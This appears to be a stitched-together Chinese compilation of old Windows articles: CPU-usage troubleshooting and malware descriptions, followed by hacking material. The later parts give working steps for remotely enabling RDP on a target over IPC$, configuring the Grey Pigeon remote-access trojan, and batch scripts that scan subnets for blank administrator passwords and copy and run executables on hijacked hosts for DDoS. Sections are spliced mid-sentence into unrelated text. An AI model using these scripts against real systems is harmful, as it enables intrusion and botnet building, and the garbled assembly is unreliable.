过了一段时间后，当问题出来时，例如CPU会再次一直处100%的水平，可以停止IIS，检查logblock.htm所记录的最后的十个文件，注意，最有问题的往往是计数器类的ACCESS文件，例如:”**COUNT. MDB ”，”**COUNT.ASP”，可以先把最后十个文件或有所怀疑的文件删除到回收站中，再启动IIS，看看问题是否再次出现。我们相信，经过仔细的查找后，您肯定可以找到这个让您操心了一段时间的文件的。

找到这个文件后，可以删除它，或下载下来，用ACCESS2000修复它，问题就解决了。

2、 svchost.exe造成CPU使用率占用100%

在win.ini文件中，在[Windows]下面，“run=”和“load=”是可能加载“木马”程序的途径，必须仔细留心它们。一般情况下，它们的等号后面什幺都没有，如果发现后面跟有路径与文件名不是你熟悉的启动文件，你的计算机就可能中上“木马”了。当然你也得看清楚，因为好多“木马”，如“AOL Trojan木马”，它把自身伪装成command.exe文件，如果不注意可能不会发现它不是真正的系统启动文件。

在system.ini文件中，在[BOOT]下面有个“shell=文件名”。正确的文件名应该是“explorer.exe”，如果不是“explorer.exe”，而是“shell= explorer.exe 程序名”，那幺后面跟着的那个程序就是“木马”程序，就是说你已经中“木马”了。

在注册表中的情况最复杂，通过regedit命令打开注册表编辑器，在点击至:“HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”目录下，查看键值中有没有自己不熟悉的自动启动文件，扩展名为EXE，这里切记:有的“木马”程序生成的文件很像系统自身文件，想通过伪装蒙混过关，如“Acid Battery v1.0木马”，它将注册表“HKEY-LOCAL-MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”下的Explorer 键值改为Explorer=“C:\Windows\expiorer.exe”，“木马”程序与真正的Explorer之间只有“i”与“l”的差别。当然在注册表中还有很多地方都可以隐藏“木马”程序，如:“HKEY-CURRENT-USER\Software\Microsoft\Windows\CurrentVersion\Run”、“HKEY-USERS\****\Software\Microsoft\Windows\CurrentVersion\Run”的目录下都有可能，最好的办法就是在“HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”下找到“木马该病毒也称为“Code Red II(红色代码2)”病毒，与早先在西方英文系统下流行“红色代码”病毒有点相反，在国际上被称为VirtualRoot(虚拟目录)病毒。该蠕虫病毒利用Microsoft已知的溢出漏洞，通过80端口来传播到其它的Web页服务器上。受感染的机器可由黑客们通过Http Get的请求运行scripts/root.exe来获得对受感染机器的完全控制权。

当感染一台服务器成功了以后，如果受感染的机器是中文的系统后，该程序会休眠2天，别的机器休眠1天。当休眠的时间到了以后，该蠕虫程序会使得机器重新启动。该蠕虫也会检查机器的月份是否是10月或者年份是否是2002年，如果是，受感染的服务器也会重新启动。当Windows NT系统启动时，NT系统会自动搜索C盘根目录下的文件explorer.exe，受该网络蠕虫程序感染的服务器上的文件explorer.exe也就是该网络蠕虫程序本身。该文件的大小是8192字节，VirtualRoot网络蠕虫程序就是通过该程序来执行的。同时，VirtualRoot网络蠕虫程序还将cmd.exe的文件从Windows NT的system目录拷贝到别的目录，给黑客的入侵敞开了大门。它还会修改系统的注册表项目，通过该注册表项目的修改，该蠕虫程序可以建立虚拟的目录C或者D，病毒名由此而来。值得一提的是，该网络蠕虫程序除了文件explorer.exe外，其余的操作不是基于文件的，而是直接在内存中来进行感染、传播的，这就给捕捉带来了较大难度。

”程序的文件名，再在整个注册表中搜索即可。

我们先看看微软是怎样描述svchost.exe的。在微软知识库314056中对svchost.exe有如下描述:svchost.exe 是从动态链接库 (DLL) 中运行的服务的通用主机进程名称。

其实svchost.exe是Windows XP系统的一个核心进程。svchost.exe不单单只出现在Windows XP中，在使用NT内核的Windows系统中都会有svchost.exe的存在。一般在Windows 2000中svchost.exe进程的数目为2个，而在Windows XP中svchost.exe进程的数目就上升到了4个及4个以上。所以看到系统的进程列表中有几个svchost.exe不用那幺担心。

svchost.exe到底是做什幺用的呢?

首先我们要了解一点那就是Windows系统的中的进程分为:独立进程和共享进程这两种。由于Windows系统中的服务越来越多，为了节约有限的系统资源微软把很多的系统服务做成了共享模式。那svchost.exe在这中间是担任怎样一个角色呢?

svchost.exe的工作就是作为这些服务的宿主，即由svchost.exe来启动这些服务。svchost.exe只是负责为这些服务提供启动的条件，其自身并不能实现任何服务的功能，也不能为用户提供任何服务。svchost.exe通过为这些系统服务调用动态链接库(DLL)的方式来启动系统服务。

svchost.exe是病毒这种说法是任何产生的呢?

因为svchost.exe可以作为服务的宿主来启动服务，所以病毒、木马的编写者也挖空心思的要利用svchost.exe的这个特性来迷惑用户达到入侵、破坏计算机的目的。

如何才能 辨别 哪些是正常的svchost.exe进程，而哪些是 病毒进程 呢?

svchost.exe的键值是在“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Svchost”，如图1所示。图1中每个键值表示一个独立的svchost.exe组。

微软还为我们提供了一种察看系统正在运行在svchost.exe列表中的服务的方法。以Windows XP为例:在“运行”中输入:cmd，然后在命令行模式中输入:tasklist /svc。系统列出如图2所示的服务列表。图2中红框包围起来的区域就是svchost.exe启动的服务列表。如果使用的是Windows 2000系统则把前面的“tasklist /svc”命令替换为:“tlist -s”即可。如果你怀疑计算机有可能被病毒感染，svchost.exe的服务出现异常的话通过搜索 svchost.exe文件 就可以发现异常情况。一般只会找到一个在:“C:\Windows\System32”目录下的svchost.exe程序。如果你在其它目录下发现svchost.exe程序的话，那很可能就是中毒了。

还有一种确认svchost.exe是否中毒的方法是在任务管理器中察看进程的执行路径。但是由于在Windows系统自带的任务管理器不能察看进程路径，所以要使用第三方的进程察看工具。

上面简单的介绍了svchost.exe进程的相关情况。总而言之，svchost.exe是一个系统的核心进程，并不是病毒进程。但由于svchost.exe进程的特殊性，所以病毒也会千方百计的入侵svchost.exe。通过察看svchost.exe进程的执行路径可以确认是否中毒。

3、 Services.exe造成CPU使用率占用100%

症状

在基于 Windows 2000 的计算机上，Services.exe 中的 CPU 使用率可能间歇性地达到100 %，并且计算机可能停止响应(挂起)。出现此问题时，连接到该计算机(如果它是文件服务器或域控制器)的用户会被断开连接。您可能还需要重新启动计算机。如果 Esent.dll 错误地处理将文件刷新到磁盘的方式，则会出现此症状。

解决方案

Service Pack 信息

要解决此问题，请获取最新的 Microsoft Windows 2000 Service Pack。有关其它信息，请单击下面的文章编号，以查看 Microsoft 知识库中相应的文章:

260910 如何获取最新的 Windows 2000 Service Pack

修复程序信息

Microsoft 提供了受支持的修补程序，但该程序只是为了解决本文所介绍的问题。只有计算机遇到本文提到的特定问题时才可应用此修补程序。此修补程序可能还会接受其它一些测试。因此，如果这个问题没有对您造成严重的影响，Microsoft 建议您等待包含此修补程序的下一个 Windows 2000 Service Pack。

要立即解决此问题，请与“Microsoft 产品支持服务”联系，以获取此修补程序。有关“Microsoft 产品支持服务”电话号码和支持费用信息的完整列表，请访问 Microsoft Web 站点:

注意 :特殊情况下，如果 Microsoft 支持专业人员确定某个特定的更新程序能够解决您的问题，可免收通常情况下收取的电话支持服务费用。对于特定更新程序无法解决的其它支持问题和事项，将正常收取支持费用。

下表列出了此修补程序的全球版本的文件属性(或更新的属性)。这些文件的日期和时间按协调通用时间 (UTC) 列出。查看文件信息时，它将转换为本地时间。要了解 UTC 与本地时间之间的时差，请使用“控制面板”中的“日期和时间”工具中的 时区 选项卡。

状态

Microsoft 已经确认这是在本文开头列出的 Microsoft 产品中存在的问题。此问题最初是在 Microsoft Windows 2000 Service Pack 4 中更正的。

4、正常软件造成CPU使用率占用100%

首先，如果是从开机后就发生上述情况直到关机。那幺就有可能是由某个随系统同时登陆的软件造成的。可以通过运行输入“msconfig”打开“系统实用配置工具”，进入“启动”选项卡。接着，依次取消可疑选项前面的对钩，然后重新启动电脑。反复测试直到找到造成故障的软件。或者可以通过一些优化软件如“优化大师”达到上述目的。另:如果键盘内按键卡住也可能造成开机就出现上述问题。

如果是使用电脑途中出项这类问题，可以调出任务管理器(WINXP CTRL+ALT+DEL WIN2000 CTRL+SHIFT“ESC)，进入”进程“选项卡，看”CPU“栏，从里面找到占用资源较高的程序(其中SYSTEM IDLE PROCESS是属于正常，它的值一般都很高，它的作用是告诉当前你可用的CPU资源是多少，所以它的值越高越好)通过搜索功能找到这个进程属于哪个软件。然后，可以通过升级、关闭、卸载这个软件或者干脆找个同类软件替换，问题即可得到解决。

5、病毒、木马、间谍软件造成CPU使用率占用100%

出现CPU占用率100% 的故障经常是因为病毒木马造成的，比如震荡波病毒。应该首先更新病毒库，对电脑进行全机扫描 。接着，在使用反间谍软件Ad—Aware，检查是否存在间谍软件。论坛上有不少朋友都遇到过svchost.exe占用CPU100%，这个往往是中毒的表现。

svchost.exe Windows中的系统服务是以动态链接库(DLL)的形式实现的，其中一些会把可执行程序指向svchost.exe，由它调用相应服务的动态链接库并加上相应参数来启动服务。正是因为它的特殊性和重要性，使它更容易成为了一些病毒木马的宿主。

6、 explorer.exe进程造成CPU使用率占用100%

在system.ini文件中，在[BOOT]下面有个“shell=文件名”。正确的文件名应该是“explorer.exe”，如果不是“explorer.exe”，而是“shell= explorer.exe 程序名”，那幺后面跟着的那个程序就是“木马”程序，就是说你已经中“木马”了。

在注册表中的情况最复杂，通过regedit命令打开注册表编辑器，在点击至:“HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”目录下，查看键值中有没有自己不熟悉的自动启动文件，扩展名为EXE，这里切记:有的“木马”程序生成的文件很像系统自身文件，想通过伪装蒙混过关，如“Acid Battery v1.0木马”，它将注册表“HKEY-LOCAL-MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”下的

Explorer 键值改为Explorer=“C:\Windows\expiorer.exe”，“木马”程序与真正的Explorer之间只有“i”与“l”的差别。当然在注册表中还有很多地方都可以隐藏“木马”程序，如:“HKEY-CURRENT-USER\Software\Microsoft\Windows\CurrentVersion\Run”、“HKEY-USERS\****\Software\Microsoft\Windows\CurrentVersion\Run”的目录下都有可能，最好的办法就是在“HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”下找到“木马”程序的文件名，再在整个注册表中搜索即可。

7、超线程导致CPU使用率占用100%

这类故障的共同原因就是都使用了具有超线程功能的P4 CPU。我查找了一些资料都没有明确的原因解释。据一些网友总结超线程似乎和天网防火墙有冲突，可以通过卸载天网并安装其它防火墙解决，也可以通过在BIOS中关闭超线程功能解决。

8、AVI视频文件造成CPU使用率占用100%

在Windows XP中，单击一个较大的AVI视频文件后，可能会出现系统假死现象，并且造成exploere.exe进程的使用率100%，这是因为系统要先扫描该文件，并检查文件所有部分，建立索引。如果文件较大就会需要较长时间并造成CPU占用率100%。解决方法:右键单击保存视频文件的文件夹，选择”属性—>常规—>高级“，去掉”为了快速搜索，允许索引服务编制该文件夹的索引“前面复选框的对钩即可。

9、杀毒软件CPU使用率占用100%

现在的杀毒软件一般都加入了，对网页、邮件、个人隐私的即时监空功能，这样无疑会加大系统的负担。比如:在玩游戏的时候，会非常缓慢。关闭该杀毒软件是解决得最直接办法。

10、处理较大的Word文件时CPU使用率过高

上述问题一般还会造成电脑假死，这些都是因为WORD的拼写和语法检查造成的，只要打开WORD的“工具—选项”，进入“拼写和语法”选项卡，将其中的“键入时检查拼写”和“键入时检查语法”两项前面的复选框中的钩去掉即可。

11、网络连接导致CPU使用率占用100%

当你的Windows2000/xp作为服务器时，收到来自端口445上的连接请求后，系统将分配内存和少量CPU资源来为这些连接提供服务，当负荷过重，就会出现上述情况。要解决这个问题可以通过修改注册表来解决，打开注册表，找到HKEY—LOCAL—MACHNE\SYSTEM\CurrentControlSet\Services\lanmanserver，在右面新建一个名为"；maxworkitems"；的DWORD值.然后双击该值，如果你的电脑有512以上内存，就设置为"；1024"；，如果小于512，就设置为256.

一些不完善的驱动程序也可以造成CPU使用率过高

经常使用待机功能，也会造成系统自动关闭硬盘DMA模式。这不仅会使系统性能大幅度下降，系统启动速度变慢，也会使是系统在运行一些大型软件和游戏时CPU使用率100%，产生停顿。





进程占用CPU 100%时可能中的病毒
system Idle Process

进程文件: [system process] or [system process]

进程名称: Windows内存处理系统进程

描 述: Windows页面内存管理进程，拥有0级优先。

介 绍:该进程作为单线程运行在每个处理器上，并在系统不处理其它线程的时候分派处理器的时间。它的CPU占用率越大表示可供分配的CPU资源越多，数字越小则表示CPU资源紧张。

Spoolsv.exe

进程文件: spoolsv or Spoolsv.exe

进程名称: Printer Spooler Service

描 述: Windows打印任务控制程序，用以打印机就绪。

介 绍:缓冲(spooler)服务是管理缓冲池中的打印和传真作业。

Spoolsv.exe→打印任务控制程序，一般会先加载以供列表机打印前的准备工作

Spoolsv.exe，如果常增高，有可能是病毒感染所致

目前常见的是:

Backdoor/Byshell(又叫隐形大盗、隐形杀手、西门庆病毒)

危害程度:中

受影响的系统: Windows 2000， Windows XP， Windows Server 2003

未受影响的系统: Windows 95， Windows 98， Windows Me， Windows NT， Windows 3.x， Macintosh， Unix， Linux，

病毒危害:

1. 生成病毒文件

2. 插入正常系统文件中

3. 修改系统注册表

4. 可被黑客远程控制

5. 躲避反病毒软件的查杀

简单的后门木马，发作会删除自身程序，但将自身程序套入可执行程序内(如:exe)，并与计算机的通口(TCP端口138)挂钩，监控计算机的信息、密码，甚至是键盘操作，作为回传的信息，并不时驱动端口，以等候传进的命令，由于该木马不能判别何者是正确的端口，所以负责输出的列表机也是其驱动对象，以致Spoolsv.exe的使用异常频繁......

Backdoor.Win32.Plutor

破坏方法:感染PE文件的后门程序

病毒采用VC编写。

病毒运行后有以下行为:

1、将病毒文件复制到%WINDIR%目录下，文件名为"；Spoolsv.exe"；，并该病毒文件运行。"；Spoolsv.exe"；文件运行后释放文件名为"；mscheck.exe"；的文件到%SYSDIR%目录下，该文件的主要功能是每次激活时运行"；Spoolsv.exe"；文件。如果所运行的文件是感染了正常文件的病毒文件，病毒将会把该文件恢复并将其运行。

2、修改注册表以下键值:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run

增加数据项:"；Microsoft Script Checker"； 数据为:"；MSCHECK.EXE /START"；

修改该项注册表使"；MSCHECK.EXE"；文件每次系统激活时都将被运行，而"；MSCHECK.EXE"；用于运行"；Spoolsv.exe"；文件，从而达到病毒自激活的目的。

3、创建一个线程用于感染C盘下的PE文件，但是文件路径中包含"；winnt"；、"；Windows"；字符串的文件不感染。另外，该病毒还会枚举局域网中的共享目录并试图对这些目录下的文件进行感染。该病毒感染文件方法比较简单，将正常文件的前0x16000个字节替换为病毒文件中的数据，并将原来0x16000个字节的数删除

鸽子不能上线的原因
Ⅰ.如果你是内网IP
①首先确定是否进行了端口映射,端口映射必须是在路游上进行的,其他的映射软件只类都不是针对的这个,鸽子自带的那个端口映射大家就别想了,不会成功的
②如果你用FTP上线(确定你的映射进行的很成功,没有任何问题),文件不要输入错误,如果设置了路径,就一定要去顶这个路径正确,如果是在FTP根目录下有XXX.TXT文件直接输入xxx.txt.如果在FTP子目录xxx里,就要输入xxx/xxx.txt,依次类推.当你屡次实验不成功的话,可以去尝试换个FTP服务器,本人推荐512J的FTP服务器,相对稳定,你可以去http://512j.com申请
③如果你用的域名上线的话就不说了,以为本人还没有126的域名 -_-## 应该是没有问题的
④配置服务器的时候如果用的是域名,确定你所用的域名跟当前IP绑定,也就是说用的花生或者科迈只类的软件必须确定已经在本地机器上打开了服务端软件,而且格式一定不要错,比方说你的域名是XXX.vicp.net
一定要输入http://XXX.vicp.net 切记切记
⑤如果是网页文件配置的服务器一定要确定服务器文件格式没有输错,如果网页访问地址是http://xxx.xxx.xxx/xxx.txt一定要照全输入 一点也别改
Ⅱ.如果你是公网IP
①端口映射可以免除了,其他的类似于内网,需要注意的是,如果你配置服务器时选择IP通知的话确定IP是你的固定IP
Ⅲ.确定上述步骤都没有问题的话就不要在网络上找原因了
①确定你的防火墙关闭或者已经进行的相应的设置
②大家用黑防的鸽子时不用装那个hest文件也不需要开始HTTP傻瓜服务,但有的版本就需要这两样东西.少一样就没法配置服务器,如0725的灰鸽子2005破解 (这个要注意)
③换个鸽子用,这个是本人发现最常出的也是最多的错误,有很多的鸽子自动上线或者服务器会经常出问题
建议大家用黑防鸽子牧民战天专版,挺好用的

1.OOB攻击
    这是利用NETBIOS中一个OOB  （Out  of  Band）的漏洞而来进行的，它的原理是通过TCP／IP协议传递一个数据包到计算机某个开放的端口上（一般是137、138和139），当计算机收到这个数据包之后就会瞬间死机或者蓝屏现象，不重新启动计算机就无法继续使用TCP／IP协议来访问网络。

    2.DoS攻击

    这是针对Windows  9X所使用的ICMP协议进行的DOS（Denial  of  Service，拒绝服务）攻击，一般来说，这种攻击是利用对方计算机上所安装协议的漏洞来连续发送大量的数据包，造成对方计算机的死机。

    3.WinNuke攻击

    目前的WinNuke系列工具已经从最初的简单选择IP攻击某个端口发展到可以攻击一个IP区间范围的计算机，并且可以进行连续攻击，还能够验证攻击的效果，还可以对检测和选择端口，所以使用它可以造成某一个IP地址区间的计算机全部蓝屏死机。

    4.SSPing

    这是一个IP攻击工具，它的工作原理是向对方的计算机连续发出大型的ICMP数据包，被攻击的机器此时会试图将这些文件包合并处理，从而造成系统死机。

    5.TearDrop攻击

    这种攻击方式利用那些在TCP／IP堆栈实现中信任IP碎片中的包的标题头所包含的信息来实现自己的攻击，由于IP分段中含有指示该分段所包含的是原包哪一段的信息，所以一些操作系统下的TCP／IP协议在收到含有重叠偏移的伪造分段时将崩溃。TeadDrop最大的特点是除了能够对Windows  9X／NT进行攻击之外，连Linux也不能幸免。

怎样可以远程打开对方的3389端口

如果对方的端口有开放:
telnet 192.168.0.1
输入用户名/密码
C:\>
\\成功进入!!!!
进入后,再次检查终端组件是否安装:
c:\>query user
这个工具需要安装终端服务.

这样就进一步确定了组件没有被安装.如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1 console 0 运行中 . 2002-1-12 22:5
\\类似这样的信息,可能组件就已安装.

好!都清楚了,可以开始安装了.
---------------------------------------------------
C:\>dir c:\sysoc.inf /s //检查INF文件的位置
c:\WINNT\inf 的目录

2000-01-10 20:00 3,770 sysoc.inf
1 个文件 3,770 字节
-----------------------------------------------------
C:\> dir c:\sysocmgr.* /s //检查组件安装程序
c:\WINNT\system32 的目录

2000-01-10 20:00 42,768 sysocmgr.exe
1 个文件 42,768 字节
-----------------------------------------------------
c:\>echo [Components] > c:\wawa
c:\>echo TSEnable = on >> c:\wawa
//这是建立无人参与的安装参数
c:\>type c:\wawa
[Components]
TSEnable = on
//检查参数文件
------------------------------------------------------
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\wawa /q
-----------------------------------------------------
这一条就是真正安装组件的命令.
以上这条命令没有加/R参数,主机在安装完后自动重起.
如若加了/R参数主机就不会重起.

如果一切正常的话,几分钟后对方主机将会离线,当它重新回来时,
3389终端服务就已经开启.你就可以连上去了.

这里还有两种方法
第一种开启的办法:
使用DameWare Mini Remote Control远程连接上,
在"终端服务配置"里,重新启用RDP连接,马上就可以使用3389了.
第二种开启的办法:
修改远程注册表.
比如:
主机IP: 192.168.0.1
已有的帐号和密码: wawa/7788
首先与远程主机建立连接
net use \\192.168.0.1\ipc$ "7788" /user:"wawa"
再打开本机注册表
"开始"==>"运行"==>regedit
在"注册表"下拉菜单中选择"连接网络注册表"
在"计算机名"中输入 \\192.168.0.1
这样就进入了远程主机注册表.
现在我们找到这里:
hkey_local_machine\system\currentcontrolset\control\terminal server\winstations\rdp-tcp\fEnableWinStation
将fEnableWinStation值由0改为1
SQLEXEC或telnet进入后,检查终端组件是否安装:
c:\>query user
这个工具需要安装终端服务.
这样就进一步确定了组件没有被安装.如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1 console 0 运行中 . 2002-1-12 22:5
\\类似这样的信息,可能组件就已安装.
好!都清楚了,可以开始安装了.
---------------------------------------------------
C:\>dir c:\sysoc.inf /s //检查INF文件的位置
c:\WINNT\inf 的目录

2000-01-10 20:00 3,770 sysoc.inf
1 个文件 3,770 字节
-----------------------------------------------------
C:\> dir c:\sysocmgr.* /s //检查组件安装程序
c:\WINNT\system32 的目录

2000-01-10 20:00 42,768 sysocmgr.exe
1 个文件 42,768 字节
-----------------------------------------------------
c:\>echo [Components] > c:\wawa
c:\>echo TSEnable = on >> c:\wawa
//这是建立无人参与的安装参数
c:\>type c:\wawa
[Components]
TSEnable = on
//检查参数文件
------------------------------------------------------
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\wawa /q
-----------------------------------------------------
这一条就是真正安装组件的命令.
以上这条命令没有加/R参数,主机在安装完后自动重起.
如若加了/R参数主机就不会重起.

如果一切正常的话,几分钟后对方主机将会离线,当它重新回来时,
3389终端服务就已经开启.你就可以连上去了.
前提是对方要已经安装了终端服务的组件才行

大家知道，DOS下有一个不为大家所常用的命令——重定向命令，这个小东西非常有用，该命令同样可以用于Win9x/ME/2000/XP下，灵活的使用这个命令可以给我们带来很大的方便——无论是入侵还是防守抑或是系统应用，都会带来很大的便利。今天就让我们来看几个重定向命令在安全方面的应用实例。

一、命令格式

　　DOS的标准输入输出通常是在标准设备键盘和显示器上进行的，利用重定向,可以方便地将输入输出改向磁盘文件或其它设备。其中:

　　1.大于号“>”将命令发送到文件或设备，例如打印机>prn。使用大于号“>”时，有些命令输出(例如错误消息)不能重定向。

　　2.双大于号“>>”将命令输出添加到文件结尾而不删除文件中已有的信息。

　　3.小于号“<”从文件而不是键盘上获取命令所需的输入。

　　4.>&符号将输出从一个默认I/O流(stdout,stdin,stderr)重新定向到另一个默认I/O流。例如，command >output_file 2>&1将处理command过程中的所有错误信息从屏幕重定向到标准文件输出中。标准输出的数值如下所示:

　　标准输出 等价的数值

　　Stdin 0
　　Stdout 1
　　Stderr 2

　　其中，1和2都创建一个文件用于存放数据;4可能不能够在DOS下使用。

　　二、重定向命令的输出

　　几乎所有的命令均将输出发送到屏幕。即使是将输出发送到驱动器或打印机的命令，也会在屏幕上显示消息和提示。要将输出从屏幕重定向到文件或打印机，请使用大于号(>)。大多数命令中均可以使用大于号。例如，在以下命令中，dir命令生成的目录列表重定向到Dirlist.txt文件:dir>dirlist.txt，如果Dirlist.txt文件不存在，系统将创建该文件。如果Dirlist.txt存在，系统将使用dir命令的输出替换文件中的信息。

　　要将命令输出添加到文件结尾而不丢失文件中的任何信息，请使用双大于号(>>)。例如，在以下命令中，dir命令生成的目录列表附加到Dirlist.txt文件中:dir>dirlist.txt，将输入重定向到一个命令，就象可以将命令输出发送到文件或打印机而不是屏幕一样，您可以从文件而不是从键盘获取命令的输入。要从文件获取输入，请使用小于号(<)。例如，以下命令将从List.txt文件中获取sort命令的输入:sort

　三、应用举例


　　1.给注册表加锁/解锁

　　大家知道，注册表HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVerssion\Policies\System分支下的DWORD值“Disableregistrytools”的键值如为“1”，则可以给注册表加锁，这样别人就无法使用注册表编辑器。利用重定向命令在DOS下就可以给注册表加锁/解锁，非常方便。

　　打开记事本程序，新建一个文本文件，输入如下内容:

　　@echo REGEDIT4>>123.reg
　　@echo.>>123.reg
　　@echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]>>123.reg
　　@echo "DisableRegistryTools"=dword:00000001>>123.reg
　　@REGEDIT /S /C 123.reg
　　@deltree /y 123.reg

　　另存为以.bat为扩展名的批处理文件，点击这个文件注册表就会被锁定!

　　在上面的命令中，echo是DOS下的回显命令，在它的前面加上“@”前缀字符，表示执行时本行在命令行或DOS里面不显示，如果想看到程序执行过程，请将“@”去掉。大家在编写上述代码时要注意的是，第一行中的“REGEDIT4”一定要用大写字母，在第二行中“echo”和“.”之间没有空格。“>>”产生的内容将追加到它后面的文件中。在文件的最后一行加上deltree /y 123.reg，就可以无需确认就删除123.reg文件。

　　要想给注册表解锁，可以编辑这个批处理文件，只需将"DisableRegistryTools"=dword:00000001改为"DisableRegistryTools"=dword:00000000，其他内容不变，保存为.bat文件，点击就可以给注册表解锁了。

　　2.把登陆3389的机器IP记录下来

　　把下面的内容保存为3389IP.bat:
　　time /t >>log.log
　　netstat -n -p tcp |find ":3389">>Log.log
　　start Explorer

　　运行3389IP.bat，然后查看log.log文件即可看到登陆3389的机器IP，是不是很方便呢?

　　3.恢复DOS实模式

　　大家知道，某些恶意网页会修改浏览者的注册表，在无所不用其极的各种手段中，修改注册表使DOS实模式不可用是其中的招数之一。要想恢复DOS实模式方法有很多，用批处理和重定向命令结合使用，是比较特别的一招，在此与大家分享。

　　echo off
　　echo REGEDIT4>c:\scanreg.reg
　　@echo.>>lock.reg
　　echo [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]>>c:\scanreg.reg
　　echo "NoRealMode"=dword:00000000>>c:\scanreg.reg
　　regedit /s c:\scanreg.reg
　　@del c:\scanreg.reg

　　另存为以.bat为扩展名的批处理文件，点击这个文件就可以恢复DOS实模式，那些DOS应用程序又可以使用了。

　4.等待肉鸡上门


　　每天费时费力的找肉鸡是不是很辛苦，利用重定向命令和批处理文件就可以让你简单的找到肉鸡!方法是用记事本新建一个文本文件，输入如下内容:

　　@echo off
　　:start
　　nc -vv -w 5 -l -p 80>>rouji.log
　　goto start

　　保存为.bat文件(事先得准备好一个nc.exe文件，它是网络故障事件检测软件Netcat的主程序)，然后运行此程序之后，你就等着肉鸡上门主动来找你吧!运气好的话，每天10个不成问题。

　　5.快速进行空连接

　　空连接是在没有信任的情况下与服务器建立的会话，换句话说，它是一个到服务器的匿名访问。使用命令net use \\IP\ipc$ "" /user:"" 就可以简单地和目标建立一个空连接(需要目标开放IPC$)。利用重定向命令和for命令就可以对一个C类网段进行快速的空连接，并把结果保存到一个文件中供你分析。方法是用记事本编辑如下内容的文件:

　　@echo off
　　echo 格式:test *.*.*>test.txt
　　for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \%1.%%Gipc$ "" /use:"Administrator" | find "命令完成" >>test.txt

　　批处理文件保存为.bat，运行即可。这个批处理文件的功能是对你指定的一个C类网段中的254个ip依次试建立帐号为administrator口令为空的ipc$连接，如果成功就把结果记录在test.txt。这样就实现了NT弱口令扫描功能!其中，for命令的功能是对一组文件中的每一个文件执行某个特定命令，也就是可以用你指定的循环范围生成一系列命令。For命令的格式为:FOR %variable IN (set) DO command [command-parameters]，具体的含义:

　　%variable:指定一个单一字母可替换的参数。

　　(set):指定一个或一组文件。可以使用通配符。

　　command:指定对每个文件执行的命令。

　　command-parameters:为特定命令指定参数或命令行开关。

　　在批处理文件中使用FOR命令时，指定变量请使用%%variable而不要用%variable。变量名称是区分大小写的，所以%i不同%I。

　　6.禁止空连接

　　空连接的存在对有一定的危险，所以我们还是禁止它为好!方法是输入net share察看本地共享资源，接下来输入如下命令删除共享:

　　net share ipc$ /delete
　　net share admin$ /delete
　　net share c$ /delete
　　net share d$ /delete(如果有e,f等盘符可以同法删除)

　　然后用记事本新建一个文本文件，输入如下内容即可:

　　@echo REGEDIT4>>123.reg
　　@echo.>>123.reg
　　@echo [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA]>>123.reg
　　@echo "RestrictAnonymous"=dword:00000001>>123.reg
　　@REGEDIT /S /C 123.reg
　　@deltree /y 123.reg

　　另存为以.bat为扩展名的批处理文件，点击这个文件就可以禁止空连接。

7.扫描所有和本机以TCP协议连接的计算机


　　扫描自己的计算机端口，发现有特殊端口打开，可以查木马，不仅如此，利用下面这个批处理文件还可以把所有和本机以TCP协议连接的计算机IP地址都记录下来。这个.bat文件内容如下:

　　data /t>>123.log
　　time /t>>123.log
　　netstat -n -p tcp 10>>123.log

　　这样不仅可以记录下对方的IP，还有时间和日期，方便自己查看。

　　8.自动获取DDoS肉鸡

　　DDoS是Distributed Denial of Service的缩写，意即分布式拒绝服务攻击。它是指借助于客户/服务器技术，将多个计算机联合起来作为攻击平台，对一个或多个目标发动DoS攻击，从而成倍地提高拒绝服务攻击的威力。通常，攻击者使用一个偷窃帐号将DDoS主控程序安装在一个计算机上，在一个设定的时间主控程序将与大量代理程序通讯，代理程序已经被安装在Internet上的许多计算机上。代理程序收到指令时就发动攻击。利用客户/服务器技术，主控程序能在几秒钟内激活成百上千次代理程序的运行。

　　虽然不建议大家使用DDoS方式攻击，但作为技术掌握还是很有必要的。可是，如何才能获取进行DDoS攻击的肉鸡呢?把下面的内容保存为ok.bat文件就可以达到目的了:

　　@echo off
　　echo自动获取DDoS肉鸡
　　for /f "tokens=1,3*" %i in (host.txt) do net use \\%k\ipc$ /user:"%j"
　　copy %1 \\%i\admin$\sysytem32
　　if errorelevel 0 goto success
　　psexec -d \\%i c:\winnt\system32\%1
　　net user \\%i\ipc$ /del
　　:success
　　echo ------------------------------>>success.txt
　　echo 肉鸡:%i>>success.txt
　　echo 用户名:%j>>success.txt
　　echo 密码:%k>>success.txt
　　echo ------------------------------>>success.txt

　　使用方法是ok.bat *.exe host.txt，其中host.txt的格式为:ip administrator password。好了，快试试吧。但不要用来干破坏哦。

　　其实，本文所说的方法主要是利用了批处理和相关的命令，重定向命令在其中只是个“传接剂”，起连接作用，但它的功劳也是不小的，所以我们不要忘了重定向命令哦。本文只是抛砖引玉，希望大家畅所欲言，多多指点。在写作时参阅过众多高手的论坛帖子，多谢各位。

在日常操作中，我们经常要输入各种各样的密码，例如开机时要输入密码，QQ时也要先输入密码，假如你忘记了这些密码，就有可能用不了机器、打不开文件、不能聊天……也许还会造成很大的损失！下面我们就介绍电脑操作中常用密码的破解方法，希望能解你燃眉之急。

一、遗忘了SYSTEM密码

如果你遗忘了CMOS设置中的SYSTEM密码，就无法启动机器了， 解决的办法只能是：打开机箱，把电池取下、正负极短接，给CMOS放电，清除CMOS中的所有内容（当然也就包括密码）。然后，重新开机进行设置。

